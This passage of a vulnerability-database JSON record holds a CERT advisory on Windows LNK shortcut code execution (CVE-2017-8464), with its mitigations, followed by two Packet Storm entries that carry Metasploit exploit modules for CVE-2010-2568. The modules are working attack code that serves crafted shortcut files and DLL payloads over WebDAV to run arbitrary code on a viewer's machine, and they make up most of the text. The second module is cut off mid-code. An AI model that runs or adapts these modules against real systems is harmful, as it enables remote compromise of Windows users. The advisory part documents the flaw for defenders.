"2010-09-09T19:59:00", "published": "2010-07-15T00:00:00", "id": "VU:940193", "href": "https://www.kb.cert.org/vuls/id/940193", "type": "cert", "title": "Microsoft Windows automatically executes code specified in shortcut files", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T20:42:00", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", "CVE-2015-0096", "CVE-2017-8464"], "description": "### Overview \n\nMicrosoft Windows automatically executes code specified in shortcut (`LNK`) files.\n\n### Description \n\nMicrosoft Windows supports the use of shortcut or `LNK` files. A `LNK` file is a reference to a local file. Clicking on a `LNK` file has essentially the same outcome as clicking on the file that is specified as the shortcut target. For example, clicking a shortcut to `calc.exe` will launch `calc.exe`, and clicking a shortcut to `readme.txt` will open `readme.txt` with the associated application for handling text files.\n\nMicrosoft Windows fails to safely obtain icons for shortcut files. When Windows displays Control Panel items, it will initialize each object for the purpose of providing dynamic icon functionality. This means that a Control Panel applet will execute code when the icon is displayed in Windows. Through use of a shortcut file, an attacker can specify a malicious DLL that is to be processed within the context of the Windows Control Panel, which will result in arbitrary code execution. The specified code may reside on a USB drive, local or remote filesystem, a CD-ROM, or other locations. Viewing the location of a shortcut file with Windows Explorer is sufficient to trigger the vulnerability. Other applications that display file icons can be used as an attack vector for this vulnerability as well. \n \nThe origin of this vulnerability is outlined in [VU#940193](<https://www.kb.cert.org/vuls/id/940193>) (CVE-2010-2568). 
The fix for CVE-2010-2568 and the subsequent fix for CVE-2015-0096 are both insufficient in that they do not take into account LNK files that use the [SpecialFolderDataBlock](<https://msdn.microsoft.com/en-us/library/dd891269.aspx>) or [KnownFolderDataBlock](<https://msdn.microsoft.com/en-us/library/dd871390.aspx>) attributes to specify the location of a folder. Such files are able to bypass the whitelisting first implemented in the fix for CVE-2010-2568. \n \nExploit code for this vulnerability is publicly available. \n \n--- \n \n### Impact \n\nBy convincing a user to display a specially-crafted shortcut file, an attacker may be able to execute arbitrary code with the privileges of the user. Depending on the operating system and AutoRun/AutoPlay configuration, this can happen automatically by connecting a USB device. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nThis issue is addressed in the [Microsoft Update for CVE-2017-8464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464>). \n \n--- \n \n**Block outgoing SMB traffic** \n \nBlock outgoing connections on ports 139/tcp, 139/udp, 445/tcp, and 445/udp at your network perimeter. Doing so will help prevent machines on the local network from connecting to SMB servers on the internet. While this does not remove the vulnerability, it does block an attack vector for this and other vulnerabilities. \n \n**Disable WebDAV** \n \nEven if outgoing SMB traffic is disabled, Windows clients can still connect to network shares using the [WebDAV](<https://msdn.microsoft.com/en-us/library/windows/desktop/dd408161\\(v=vs.85\\).aspx>) protocol, which uses HTTP as a transport. WebDAV can be disabled at various layers, depending on the requirements of your organization: \n \n**At the client** \n \nTo disable WebDAV on a Windows client, set the `Startup type` property for the `WebClient` service to `Disabled`. 
Note that this may interfere with the ability to access features that utilize WebDAV, such as some aspects of Microsoft SharePoint. \n \n**On the network** \n \nWebDAV can be blocked at the network level by blocking the methods used by the WebDAV extension to HTTP. See [Blocking WebDAV methods](<https://packetsneverlie.blogspot.com/2010/09/blocking-webdav-methods.html>) for an example of how to accomplish this. Check with your firewall vendor for more details. \n \n--- \n \n### Vendor Information\n\n824672\n\n### Microsoft Corporation Affected\n\nUpdated: August 03, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 6.2 | E:F/RL:OF/RC:C \nEnvironmental | 6.2 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464>\n * <https://msdn.microsoft.com/en-us/library/windows/desktop/dd408161(v=vs.85).aspx>\n * <https://packetsneverlie.blogspot.com/2010/09/blocking-webdav-methods.html>\n\n### Acknowledgements\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2017-8464](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-8464>) \n---|--- \n**Date Public:** | 2017-06-13 \n**Date First Published:** | 2017-08-03 \n**Date Last Updated: ** | 2017-08-09 14:18 UTC \n**Document Revision: ** | 18 \n", "modified": "2017-08-09T14:18:00", 
"published": "2017-08-03T00:00:00", "id": "VU:824672", "href": "https://www.kb.cert.org/vuls/id/824672", "type": "cert", "title": "Microsoft Windows automatically executes code specified in shortcut files", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:06", "description": "", "published": "2010-08-05T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Shell LNK Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "modified": "2010-08-05T00:00:00", "id": "PACKETSTORM:92425", "href": "https://packetstormsecurity.com/files/92425/Microsoft-Windows-Shell-LNK-Code-Execution.html", "sourceData": "`## \n# $Id: ms10_046_shortcut_icon_dllloader.rb 9955 2010-08-04 02:21:20Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \n# \n# This module acts as an HTTP server \n# \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Windows Shell LNK Code Execution', \n'Description' => %q{ \nThis module exploits a vulnerability in the handling of Windows \nShortcut files (.LNK) that contain an icon resource pointing to a \nmalicious DLL. This module creates a WebDAV service that can be used \nto run an arbitrary payload when accessed as a UNC path. 
\n}, \n'Author' => \n[ \n'hdm', # Module itself \n'jduck', # WebDAV implementation, UNCHOST var \n'B_H' # Clean LNK template \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 9955 $', \n'References' => \n[ \n['CVE', '2010-2568'], \n['OSVDB', '66387'], \n['MSB', 'MS10-046'], \n['URL', 'http://www.microsoft.com/technet/security/advisory/2286198.mspx'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 2048, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', { } ] \n], \n'DisclosureDate' => 'Jul 16 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptPort.new( 'SRVPORT', [ true, \"The daemon port to listen on (do not change)\", 80 ]), \nOptString.new( 'URIPATH', [ true, \"The URI to use (do not change).\", \"/\" ]), \nOptString.new( 'UNCHOST', [ false, \"The host portion of the UNC path to provide to clients (ex: 1.2.3.4).\" ]) \n], self.class) \n \nderegister_options('SSL', 'SSLVersion') # Just for now \nend \n \ndef on_request_uri(cli, request) \n \ncase request.method \nwhen 'OPTIONS' \nprocess_options(cli, request) \nwhen 'PROPFIND' \nprocess_propfind(cli, request) \nwhen 'GET' \nprocess_get(cli, request) \nelse \nprint_error(\"Unexpected request method encountered: #{request.method}\") \nresp = create_response(404, \"Not Found\") \nresp.body = \"\" \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nend \n \nend \n \ndef process_get(cli, request) \n \nmyhost = (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nwebdav = \"\\\\\\\\#{myhost}\\\\\" \n \nif (request.uri =~ /\\.dll$/i) \nprint_status \"Sending DLL payload #{cli.peerhost}:#{cli.peerport} ...\" \nreturn if ((p = regenerate_payload(cli)) == nil) \n# Can't use generate_exe from Msf::Exploit::EXE since it can't currently generate dlls :-/ \ndata = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded) \nsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) \nreturn \nend \n \nif (request.uri =~ /\\.lnk$/i) \nprint_status \"Sending LNK file to #{cli.peerhost}:#{cli.peerport} ...\" \n \ndata = generate_link(\"#{@exploit_unc}#{@exploit_dll}\") \n \nsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) \nreturn \nend \n \nprint_status \"Sending UNC redirect to #{cli.peerhost}:#{cli.peerport} ...\" \nresp = create_response(200, \"OK\") \n \nresp.body = %Q|<html><head><meta http-equiv=\"refresh\" content=\"0;URL=#{@exploit_unc}\"></head><body></body></html>| \n \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nend \n \n# \n# OPTIONS requests sent by the WebDav Mini-Redirector \n# \ndef process_options(cli, request) \nprint_status(\"Responding to WebDAV OPTIONS request from #{cli.peerhost}:#{cli.peerport}\") \nheaders = { \n'MS-Author-Via' => 'DAV', \n# 'DASL' => '<DAV:sql>', \n# 'DAV' => '1, 2', \n'Allow' => 'OPTIONS, GET, PROPFIND', \n'Public' => 'OPTIONS, GET, PROPFIND' \n} \nresp = create_response(207, \"Multi-Status\") \nresp.body = \"\" \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nend \n \n# \n# PROPFIND requests sent by the WebDav Mini-Redirector \n# \ndef process_propfind(cli, request) \npath = request.uri \nprint_status(\"Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport} #{path}\") \nbody = '' \n \nmy_host = (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nmy_uri = \"http://#{my_host}/\" \n \nif path =~ /\\.dll$/i \n# Response for the DLL \nprint_status(\"Sending DLL multistatus for #{path} ...\") \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{@exploit_dll}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>application/octet-stream</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \n \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nreturn \nend \n \nif path =~ /\\.lnk$/i \n# Response for the DLL \nprint_status(\"Sending DLL multistatus for #{path} ...\") \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{@exploit_lnk}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100)+128}</lp1:getcontentlength> 
\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>shortcut</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \n \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nreturn \nend \n \nif path !~ /\\/$/ \n \nif path.index(\".\") \nprint_status(\"Sending 404 for #{path} ...\") \nresp = create_response(404, \"Not Found\") \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nreturn \nelse \nprint_status(\"Sending 301 for #{path} ...\") \nresp = create_response(301, \"Moved\") \nresp[\"Location\"] = path + \"/\" \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nreturn \nend \nend \n \nprint_status(\"Sending directory multistatus for #{path} ...\") \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype><D:collection/></lp1:resourcetype> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> 
\n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>httpd/unix-directory</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \n \n \nsubdirectory = %Q| \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{Rex::Text.rand_text_alpha(6)}/</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype><D:collection/></lp1:resourcetype> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>httpd/unix-directory</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \n \nfiles = %Q| \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{@exploit_dll}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>application/octet-stream</D:getcontenttype> \n</D:prop> 
\n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{@exploit_lnk}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100)+128}</lp1:getcontentlength> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>shortcut</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \nif request[\"Depth\"].to_i > 0 \nif path.scan(\"/\").length < 2 \nbody << subdirectory \nelse \nbody << files \nend \nend \n \nbody << \"</D:multistatus>\" \n \nbody.gsub!(/\\t/, '') \n \n# send the response \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml; charset=\"utf8\"' \ncli.send_response(resp) \nend \n \ndef generate_link(unc) \nuni_unc = unc.unpack(\"C*\").pack(\"v*\") \npath = '' \npath << [ \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00 \n].pack(\"C*\") \npath << uni_unc \n \n# LinkHeader \nret = [ \n0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 \n].pack('C*') \n \nidlist_data = '' \nidlist_data << [0x12 + 2].pack('v') \nidlist_data << [ \n0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, \n0x30, 0x9d \n].pack('C*') \nidlist_data << [0x12 + 2].pack('v') \nidlist_data << [ \n0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, \n0x30, 0x9d \n].pack('C*') \nidlist_data << [path.length + 2].pack('v') \nidlist_data << path \nidlist_data << [0x00].pack('v') # TERMINAL WOO \n \n# LinkTargetIDList \nret << [idlist_data.length].pack('v') # IDListSize \nret << idlist_data \n \n# ExtraData blocks (none) \nret << [rand(4)].pack('V') \n \n# Patch in the LinkFlags \nret[0x14, 4] = [\"10000001000000000000000000000000\".to_i(2)].pack('N') \nret \nend \n \ndef exploit \n \nunc = \"\\\\\\\\\" \nif (datastore['UNCHOST']) \nunc << datastore['UNCHOST'].dup \nelse \nunc << ((datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']) \nend \nunc << \"\\\\\" \nunc << rand_text_alpha(rand(8)+4) \nunc << \"\\\\\" \n \n@exploit_unc = unc \n@exploit_lnk = rand_text_alpha(rand(8)+4) + \".lnk\" \n@exploit_dll = rand_text_alpha(rand(8)+4) + \".dll\" \n \nif datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' \nraise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/' \nend \n \nprint_status(\"\") \nprint_status(\"Send vulnerable clients to #{@exploit_unc}.\") \nprint_status(\"Or, get clients to save and render the icon of http://<your host>/<anything>.lnk\") \nprint_status(\"\") \n \nsuper \nend \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/92425/ms10_046_shortcut_icon_dllloader.rb.txt"}, {"lastseen": "2016-12-05T22:13:45", "description": "", "published": "2010-07-21T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Shell LNK Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "modified": "2010-07-21T00:00:00", "id": "PACKETSTORM:91994", "href": "https://packetstormsecurity.com/files/91994/Microsoft-Windows-Shell-LNK-Code-Execution.html", "sourceData": "`## \n# $Id: ms10_xxx_windows_shell_lnk_execute.rb 9888 2010-07-20 19:54:56Z hdm $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \n# \n# This module acts as an HTTP server \n# \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Windows Shell LNK Code Execution', \n'Description' => %q{ \nThis module exploits a vulnerability in the handling of Windows \nShortcut files (.LNK) that contain an icon resource pointing to a \nmalicious DLL. This module creates a WebDAV service that can be used \nto run an arbitrary payload when accessed as a UNC path. \n \n}, \n'Author' => \n[ \n'hdm', # Module itself \n'jduck', # WebDAV implementation \n'B_H' # Clean LNK template \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 9888 $', \n'References' => \n[ \n['CVE', '2010-2568'], \n['OSVDB', '66387'], \n['URL', 'http://www.microsoft.com/technet/security/advisory/2286198.mspx'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 2048, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', { } ] \n], \n'DisclosureDate' => 'Jun 09 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptPort.new( 'SRVPORT', [ true, \"The daemon port to listen on (do not change)\", 80 ]), \nOptString.new( 'URIPATH', [ true, \"The URI to use (do not change).\", \"/\" ]), \n], self.class) \n \nderegister_options('SSL', 'SSLVersion') # Just for now \nend \n \ndef on_request_uri(cli, request) \n \ncase request.method \nwhen 'OPTIONS' \nprocess_options(cli, request) \nwhen 'PROPFIND' \nprocess_propfind(cli, request) \nwhen 'GET' \nprocess_get(cli, request) \nelse \nprint_error(\"Unexpected request method encountered: #{request.method}\") \nresp = create_response(404, \"Not Found\") \nresp.body = \"\" \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nend \n \nend \n \ndef process_get(cli, request) \n \nmyhost = 
(datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nwebdav = \"\\\\\\\\#{myhost}\\\\\" \n \nif (request.uri =~ /\\.dll$/i) \nprint_status \"Sending DLL payload #{cli.peerhost}:#{cli.peerport} ...\" \nreturn if ((p = regenerate_payload(cli)) == nil) \n \ndata = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded) \nsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) \nreturn \nend \n \nif (request.uri =~ /\\.lnk$/i) \nprint_status \"Sending LNK file to #{cli.peerhost}:#{cli.peerport} ...\" \nreturn if ((p = regenerate_payload(cli)) == nil) \n \ndata = generate_link(\"#{webdav}#{@exploit_base}\\\\#{@exploit_dll}\") \n \nsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) \nreturn \nend \n \nprint_status \"Sending UNC redirect to #{cli.peerhost}:#{cli.peerport} ...\" \nresp = create_response(200, \"OK\") \n \nresp.body = %Q|<html><head><meta http-equiv=\"refresh\" content=\"0;URL=\\\\\\\\#{webdav}#{@exploit_base}\\\\\"></head><body></body></html>| \n \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nend \n \n# \n# OPTIONS requests sent by the WebDav Mini-Redirector \n# \ndef process_options(cli, request) \nprint_status(\"Responding to WebDAV OPTIONS request from #{cli.peerhost}:#{cli.peerport}\") \nheaders = { \n'MS-Author-Via' => 'DAV', \n# 'DASL' => '<DAV:sql>', \n# 'DAV' => '1, 2', \n'Allow' => 'OPTIONS, GET, PROPFIND', \n'Public' => 'OPTIONS, GET, PROPFIND' \n} \nresp = create_response(207, \"Multi-Status\") \nresp.body = \"\" \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nend \n \n# \n# PROPFIND requests sent by the WebDav Mini-Redirector \n# \ndef process_propfind(cli, request) \npath = request.uri \nprint_status(\"Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport} #{path}\") \nbody = '' \n \nmy_host = (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nmy_uri = \"http://#{my_host}/\" \n \nif path =~ /\\.dll$/i \n# Response for the DLL \nprint_status(\"Sending DLL multistatus for #{path} ...\") \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{@exploit_dll}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>application/octet-stream</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \n \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nreturn \nend \n \nif path =~ /\\.lnk$/i \n# Response for the DLL \nprint_status(\"Sending DLL multistatus for #{path} ...\") \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{@exploit_lnk}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100)+128}</lp1:getcontentlength> 
\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>shortcut</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \n \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nreturn \nend \n \nif path !~ /\\/$/ \n \nif path.index(\".\") \nprint_status(\"Sending 404 for #{path} ...\") \nresp = create_response(404, \"Not Found\") \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nreturn \nelse \nprint_status(\"Sending 301 for #{path} 